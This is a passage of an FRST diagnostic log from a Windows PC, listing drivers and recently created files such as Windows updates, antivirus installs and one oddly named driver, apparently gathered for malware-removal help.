R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [266896 2012-06-13] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
S3 SmbDrvI; C:\Windows\System32\drivers\Smb_driver_Intel.sys [43832 2012-08-24] (Synaptics Incorporated)
S1 vfrrubmu; C:\WINDOWS\system32\drivers\vfrrubmu.sys [55168 2015-07-29] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-02-03] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2012-08-31] (Hewlett-Packard Development Company, L.P.)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-07-29 20:46 - 2015-07-29 20:48 - 00012001 _____ C:\Users\Richie\Desktop\FRST.txt
2015-07-29 20:41 - 2015-07-29 20:41 - 00055168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vfrrubmu.sys
2015-07-29 17:42 - 2015-07-29 17:43 - 02169856 _____ (Farbar) C:\Users\Richie\Desktop\FRST64.exe
2015-07-28 19:59 - 2015-07-05 06:08 - 00300704 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2015-07-28 16:37 - 2015-07-28 16:39 - 00036677 _____ C:\Users\Richie\Downloads\Addition.txt
2015-07-28 16:37 - 2015-07-25 09:34 - 01084928 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2015-07-28 16:34 - 2015-07-29 20:46 - 00000000 ____D C:\FRST
2015-07-28 16:34 - 2015-07-28 16:39 - 00072365 _____ C:\Users\Richie\Downloads\FRST.txt
2015-07-28 16:30 - 2015-07-28 16:30 - 02146816 _____ (Farbar) C:\Users\Richie\Downloads\FRST64.exe
2015-07-28 16:00 - 2015-07-28 16:00 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Avira
2015-07-28 15:50 - 2015-07-15 08:37 - 00148632 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00137288 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00043576 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys
2015-07-28 15:50 - 2015-07-15 08:37 - 00028600 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avkmgr.sys
2015-07-28 15:13 - 2015-07-28 15:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2015-07-28 15:13 - 2015-07-28 15:13 - 00001132 _____ C:\Users\Public\Desktop\Avira.lnk
2015-07-28 15:12 - 2015-07-28 15:50 - 00000000 ____D C:\Program Files (x86)\Avira
2015-07-28 15:09 - 2015-07-28 16:04 - 00000000 ____D C:\ProgramData\Avira
2015-07-28 15:06 - 2015-07-28 15:08 - 04636584 _____ (Avira Operations GmbH & Co. KG) C:\Users\Richie\Downloads\avira.exe
2015-07-27 21:59 - 2015-07-29 17:09 - 00113880 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2015-07-27 21:58 - 2015-07-27 21:58 - 00001114 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-07-27 21:58 - 2015-07-27 21:58 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-07-27 21:58 - 2015-06-18 08:42 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2015-07-27 21:58 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2015-07-27 21:58 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2015-07-27 21:03 - 2015-07-27 21:57 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Richie\Downloads\mbam-setup-2.1.8.1057.exe
2015-07-27 20:51 - 2015-07-27 20:51 - 00002275 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-07-27 20:51 - 2015-07-27 20:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-07-27 20:40 - 2015-07-29 20:39 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2015-07-27 20:40 - 2015-07-29 19:55 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2015-07-27 20:40 - 2015-07-27 21:50 - 00003892 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2015-07-27 20:40 - 2015-07-27 21:50 - 00003656 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2015-07-27 20:40 - 2015-07-27 20:50 - 00000000 ____D C:\Program Files (x86)\Google
2015-07-27 20:39 - 2015-07-27 20:51 - 00000000 ____D C:\Users\Richie\AppData\Local\Google
2015-07-27 20:39 - 2015-07-27 20:39 - 00000000 ____D C:\Users\Richie\AppData\Local\Deployment
2015-07-27 20:39 - 2015-07-27 20:39 - 00000000 ____D C:\Users\Richie\AppData\Local\Apps\2.0
2015-07-27 08:00 - 2015-07-27 08:00 - 00000000 ____D C:\Program Files\Common Files\AV
2015-07-24 13:07 - 2015-07-14 10:14 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2015-07-24 13:07 - 2015-07-14 10:14 - 00301056 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2015-07-24 13:07 - 2015-07-14 10:14 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2015-07-24 13:07 - 2015-07-14 10:13 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2015-07-24 13:07 - 2015-05-25 09:23 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcResources.dll
2015-07-24 13:07 - 2015-05-25 09:07 - 01430528 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2015-07-22 19:34 - 2015-07-22 19:34 - 00000000 ____D C:\Users\Richie\AppData\Local\GWX
2015-07-20 08:25 - 2015-07-20 08:25 - 00000000 ____D C:\ProgramData\ATI
2015-07-20 08:00 - 2015-07-25 08:15 - 00000000 ___SD C:\WINDOWS\system32\GWX
2015-07-20 08:00 - 2015-07-20 08:00 - 00000000 ___SD C:\WINDOWS\SysWOW64\GWX
2015-07-17 09:52 - 2015-07-17 09:52 - 00060601 _____ C:\WINDOWS\SysWOW64\CCCInstall_201507170952212808.log
2015-07-17 09:51 - 2015-07-17 09:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2015-07-17 09:49 - 2015-07-28 15:13 - 00000000 ____D C:\ProgramData\Package Cache
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default\AppData\Roaming\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default\AppData\Local\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default User\AppData\Roaming\ATI
2015-07-17 09:46 - 2015-07-17 09:46 - 00000000 ____D C:\Users\Default User\AppData\Local\ATI
2015-07-17 09:45 - 2015-07-17 09:45 - 00000000 ____D C:\AMD
2015-07-17 09:43 - 2015-07-17 09:43 - 00000000 ____D C:\Program Files\AMD
2015-07-17 08:53 - 2015-07-17 08:53 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-07-16 13:18 - 2015-06-15 18:39 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2015-07-16 13:18 - 2015-06-15 18:38 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2015-07-16 13:18 - 2015-06-15 18:26 - 00633856 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2015-07-16 13:18 - 2015-06-15 18:24 - 00816640 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2015-07-16 13:18 - 2015-06-15 18:02 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2015-07-16 13:18 - 2015-06-15 17:58 - 00199680 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrating.dll
2015-07-16 13:18 - 2015-06-15 17:57 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2015-07-16 13:18 - 2015-06-15 17:56 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2015-07-16 13:18 - 2015-06-15 17:55 - 00316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2015-07-16 13:18 - 2015-06-15 17:49 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2015-07-16 13:18 - 2015-06-15 17:41 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2015-07-16 13:18 - 2015-06-15 17:38 - 00801280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2015-07-16 13:18 - 2015-06-15 17:36 - 02125824 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2015-07-16 13:18 - 2015-06-15 17:17 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2015-07-16 13:18 - 2015-06-15 17:16 - 02427392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2015-07-16 13:18 - 2015-06-15 17:15 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2015-07-16 13:18 - 2015-06-15 17:13 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2015-07-16 13:18 - 2015-06-15 17:04 - 00478208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieui.dll
2015-07-16 13:18 - 2015-06-15 17:03 - 00664064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2015-07-16 13:18 - 2015-06-15 16:52 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2015-07-16 13:18 - 2015-06-15 16:47 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2015-07-16 13:18 - 2015-06-15 16:44 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrating.dll
2015-07-16 13:18 - 2015-06-15 16:43 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2015-07-16 13:18 - 2015-06-15 16:42 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2015-07-16 13:18 - 2015-06-15 16:41 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2015-07-16 13:18 - 2015-06-15 16:37 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2015-07-16 13:18 - 2015-06-15 16:32 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2015-07-16 13:18 - 2015-06-15 16:31 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2015-07-16 13:18 - 2015-06-15 16:30 - 02052608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2015-07-16 13:18 - 2015-06-15 16:30 - 00327168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2015-07-16 13:18 - 2015-06-15 16:17 - 01048576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\actxprxy.dll
2015-07-16 13:18 - 2015-06-15 16:07 - 01951232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2015-07-16 13:18 - 2015-06-15 16:02 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2015-07-16 13:18 - 2015-05-22 23:14 - 00341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\html.iec
2015-07-16 13:18 - 2015-05-22 23:04 - 00620032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2015-07-16 13:18 - 2015-05-22 15:00 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2015-07-16 13:18 - 2015-05-22 14:47 - 00814080 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2015-07-16 13:18 - 2015-05-22 14:08 - 00374272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2015-07-16 13:18 - 2015-04-21 12:13 - 00107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\inseng.dll
2015-07-16 13:18 - 2015-04-21 11:49 - 00720384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2015-07-16 13:18 - 2015-01-11 22:21 - 00490496 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtmsft.dll
2015-07-16 13:18 - 2015-01-11 21:45 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtmsft.dll
2015-07-16 12:35 - 2015-07-02 17:21 - 19877376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2015-07-16 12:35 - 2015-07-02 16:50 - 02279424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2015-07-16 12:35 - 2015-07-02 16:49 - 25193984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2015-07-16 12:35 - 2015-07-02 16:23 - 02885632 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2015-07-16 12:35 - 2015-07-02 16:19 - 12855296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2015-07-16 12:35 - 2015-07-02 15:55 - 01310720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2015-07-16 12:35 - 2015-07-02 15:20 - 14453248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2015-07-16 12:35 - 2015-07-02 14:59 - 01545728 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2015-07-16 12:00 - 2015-04-13 18:37 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\authz.dll
2015-07-16 12:00 - 2015-04-13 18:34 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authz.dll
2015-07-16 11:55 - 2015-07-01 18:08 - 05923840 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2015-07-16 11:55 - 2015-07-01 17:14 - 04520448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2015-07-16 11:51 - 2015-02-03 19:58 - 00264000 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdFilter.sys
2015-07-16 11:51 - 2015-02-03 19:58 - 00114496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdNisDrv.sys
2015-07-16 11:51 - 2015-02-03 19:58 - 00044024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdBoot.sys
2015-07-16 11:51 - 2015-02-02 19:53 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\system32\winshfhc.dll
2015-07-16 11:51 - 2015-02-02 19:53 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winshfhc.dll
2015-07-16 11:51 - 2014-11-09 22:29 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceSetupStatusProvider.dll
2015-07-16 11:51 - 2014-11-09 21:51 - 00028672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceSetupStatusProvider.dll
2015-07-16 11:50 - 2015-07-09 15:51 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2015-07-16 11:50 - 2015-07-09 14:40 - 00359936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
2015-07-16 11:50 - 2015-07-09 12:03 - 03701760 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2015-07-16 11:50 - 2015-07-09 11:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
2015-07-16 11:50 - 2015-07-09 11:53 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
2015-07-16 11:50 - 2015-07-09 11:50 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll
2015-07-16 11:50 - 2015-07-09 11:50 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
2015-07-16 11:50 - 2015-07-09 11:48 - 00891904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2015-07-16 11:50 - 2015-07-09 11:46 - 02229248 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
2015-07-16 11:50 - 2015-07-09 11:38 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
2015-07-16 11:50 - 2015-07-09 11:37 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
2015-07-16 11:50 - 2015-07-09 11:35 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
2015-07-16 11:50 - 2015-07-09 11:34 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2015-07-16 11:50 - 2015-06-26 23:08 - 00066048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2015-07-16 11:50 - 2015-06-26 23:08 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2015-07-16 11:50 - 2015-06-26 22:14 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
2015-07-16 11:42 - 2015-05-07 13:50 - 22292672 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2015-07-16 11:42 - 2015-05-07 13:00 - 03109376 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2015-07-16 11:42 - 2015-05-07 12:53 - 19734960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2015-07-16 11:42 - 2015-05-07 12:12 - 02706432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2015-07-16 11:42 - 2015-03-14 04:20 - 01385256 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2015-07-16 11:42 - 2015-03-14 04:13 - 01124352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2015-07-16 11:42 - 2014-12-08 23:45 - 00393728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\scesrv.dll
2015-07-16 11:42 - 2014-12-08 21:56 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\scesrv.dll
2015-07-16 11:36 - 2015-04-24 22:34 - 00653824 _____ (Microsoft Corporation) C:\WINDOWS\system32\comctl32.dll
2015-07-16 11:36 - 2015-04-24 22:33 - 00549888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2015-07-16 11:36 - 2015-04-09 21:00 - 01996800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2015-07-16 11:36 - 2015-04-09 20:50 - 01387008 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2015-07-16 11:36 - 2015-04-09 20:26 - 01560576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2015-07-16 11:35 - 2015-03-23 17:59 - 07476032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2015-07-16 11:35 - 2015-03-23 17:59 - 01733952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2015-07-16 11:35 - 2015-03-23 17:59 - 00360480 _____ (Microsoft Corporation) C:\WINDOWS\system32\sechost.dll
2015-07-16 11:35 - 2015-03-23 17:58 - 01498872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2015-07-16 11:35 - 2015-03-23 17:45 - 00257216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sechost.dll
2015-07-16 11:35 - 2015-03-20 00:12 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2015-07-16 11:35 - 2015-03-20 00:10 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
2015-07-16 11:35 - 2015-03-20 00:10 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64cpu.dll
2015-07-16 11:35 - 2015-03-19 23:17 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\tracerpt.exe
2015-07-16 11:35 - 2015-03-19 22:41 - 00369152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tracerpt.exe
2015-07-16 11:35 - 2015-03-19 22:40 - 00950784 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdh.dll
2015-07-16 11:35 - 2015-03-19 22:16 - 00749568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdh.dll
2015-07-16 11:35 - 2014-10-28 21:57 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
2015-07-16 11:35 - 2014-10-28 21:15 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
2015-07-16 11:35 - 2014-10-28 21:15 - 00005632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
2015-07-16 11:35 - 2014-10-28 21:14 - 00004096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
2015-07-16 11:35 - 2014-10-28 21:13 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
2015-07-16 11:35 - 2014-10-28 21:13 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
2015-07-16 11:34 - 2015-02-02 20:03 - 03551744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
2015-07-16 11:34 - 2015-02-02 20:02 - 04298240 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2015-07-16 11:34 - 2015-01-29 22:03 - 01488896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42u.dll
2015-07-16 11:34 - 2015-01-29 22:03 - 01464832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfc42.dll
2015-07-16 11:34 - 2015-01-29 21:44 - 01230336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42u.dll
2015-07-16 11:34 - 2015-01-29 21:42 - 01204224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfc42.dll
2015-07-16 11:34 - 2014-06-09 18:13 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2015-07-16 11:34 - 2014-06-09 18:13 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2015-07-16 11:33 - 2015-05-03 11:09 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2015-07-16 11:33 - 2015-05-03 10:58 - 00210944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2015-07-16 11:33 - 2015-05-03 10:55 - 00971776 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSShared.dll
2015-07-16 11:33 - 2015-05-03 10:49 - 00811008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WSShared.dll
2015-07-16 11:33 - 2015-03-05 22:47 - 01696256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2015-07-16 11:33 - 2015-02-17 19:19 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpapisrv.dll
2015-07-16 11:33 - 2015-01-27 22:24 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorageContextHandler.dll
2015-07-16 11:33 - 2015-01-27 21:47 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StorageContextHandler.dll
2015-07-16 11:17 - 2015-01-30 19:20 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\system32\ubpm.dll
2015-07-16 11:17 - 2015-01-27 00:22 - 00131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2015-07-16 11:17 - 2015-01-26 22:11 - 03547648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2015-07-16 11:16 - 2015-03-13 21:51 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wu.upgrade.ps.dll
2015-07-16 11:16 - 2015-03-13 20:09 - 00200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2015-07-16 11:16 - 2014-10-18 02:50 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaext.dll
2015-07-16 11:16 - 2014-07-23 23:20 - 00875688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll
2015-07-16 11:16 - 2014-07-23 23:20 - 00869544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll
2015-07-16 11:15 - 2015-05-11 12:34 - 00332800 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcpl.dll
2015-07-16 11:15 - 2015-05-07 12:47 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\apphelp.dll
2015-07-16 11:15 - 2015-03-10 21:49 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\sdbinst.exe
2015-07-16 11:15 - 2015-03-10 21:09 - 00021504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sdbinst.exe
2015-07-16 11:14 - 2015-05-12 09:19 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemEventsBrokerServer.dll
2015-07-16 11:14 - 2015-05-03 11:07 - 07784448 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2015-07-16 11:14 - 2015-05-03 10:57 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2015-07-16 11:14 - 2015-05-01 19:33 - 00410739 _____ C:\WINDOWS\system32\ApnDatabase.xml
2015-07-16 11:10 - 2015-04-29 19:22 - 00130048 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2015-07-16 11:10 - 2015-01-26 23:44 - 00933888 _____ (Microsoft Corporation) C:\WINDOWS\system32\calc.exe
2015-07-16 11:10 - 2015-01-23 21:51 - 00816128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\calc.exe
2015-07-16 11:09 - 2014-10-30 19:39 - 01970432 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2015-07-16 11:09 - 2014-10-30 19:38 - 01612992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2015-07-16 11:03 - 2015-03-17 13:26 - 00467776 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2015-07-16 10:57 - 2015-06-24 22:31 - 04177920 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2015-07-16 10:57 - 2015-06-15 18:41 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
2015-07-16 10:57 - 2015-06-15 18:24 - 03320320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2015-07-16 10:57 - 2015-06-15 17:16 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
2015-07-16 10:57 - 2015-06-15 17:09 - 03607552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2015-07-16 10:57 - 2015-06-15 16:50 - 02774528 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2015-07-16 10:57 - 2015-06-15 15:57 - 02460160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2015-07-16 10:57 - 2015-01-23 03:17 - 00723072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2015-07-16 10:57 - 2015-01-23 01:02 - 00560392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2015-07-16 10:54 - 2015-01-28 21:58 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\photowiz.dll
2015-07-16 10:54 - 2015-01-28 21:29 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\photowiz.dll
2015-07-16 10:50 - 2015-04-30 19:05 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2015-07-16 10:50 - 2015-04-30 18:48 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2015-07-16 10:37 - 2015-03-19 21:56 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ahcache.sys
